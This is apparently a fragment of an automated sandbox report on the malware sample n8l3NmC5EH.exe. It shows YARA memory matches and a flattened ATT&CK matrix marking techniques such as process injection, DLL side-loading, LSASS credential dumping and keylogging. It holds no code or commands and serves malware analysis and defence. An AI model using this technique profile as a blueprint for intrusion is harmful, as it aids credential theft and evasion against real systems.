                Source: Yara matchFile source: Process Memory Space: n8l3NmC5EH.exe PID: 7500, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: n8l3NmC5EH.exe PID: 3180, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                111
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                1
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Disable or Modify Tools
                LSASS Memory1
                Process Discovery
                Remote Desktop Protocol11
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                3
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                System Network Configuration Discovery
                SSHKeylogging14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                Obfuscated Files or Information
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Timestomp
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.